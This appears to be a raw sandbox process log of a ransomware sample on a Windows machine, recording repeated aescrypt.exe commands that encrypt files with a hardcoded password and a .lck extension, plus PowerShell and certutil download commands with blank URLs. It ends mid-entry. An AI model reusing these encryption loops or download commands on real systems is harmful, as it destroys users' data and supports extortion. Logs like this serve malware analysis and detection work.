C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
3⤵
PID:820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:1392

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
3⤵
PID:848

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
3⤵
PID:344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:1988

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:1780

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:2004

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
3⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
3⤵
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:1940

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
3⤵
PID:756

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1112

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1680

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:1232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
3⤵
PID:820

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1392

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:848

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:944

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
3⤵
PID:1988

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1780

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2004

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
3⤵
PID:1940

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
3⤵
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:756

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1112

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
3⤵
PID:1232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
3⤵
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
3⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
3⤵
PID:820

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
3⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1392

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:876

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:296

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1972

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RDBCF7.tmp.lck" "RDBCF7.tmp"
3⤵
PID:928

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FXSAPIDebugLogFile.txt.lck" "FXSAPIDebugLogFile.txt"
3⤵
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "jawshtml.html.lck" "jawshtml.html"
3⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "kill.bat.lck" "kill.bat"
3⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "jusched.log.lck" "jusched.log"
3⤵
PID:2012

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "p2d.bat.lck" "p2d.bat"
3⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "wmsetup.log.lck" "wmsetup.log"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"
3⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt"
3⤵
PID:872

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_SetupUtility.txt.lck" "dd_SetupUtility.txt"
3⤵
PID:584

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "dd_wcf_CA_smci_20201028_185702_190.txt.lck" "dd_wcf_CA_smci_20201028_185702_190.txt"
3⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ASPNETSetup_00001.log.lck" "ASPNETSetup_00001.log"
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ASPNETSetup_00000.log.lck" "ASPNETSetup_00000.log"
3⤵
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
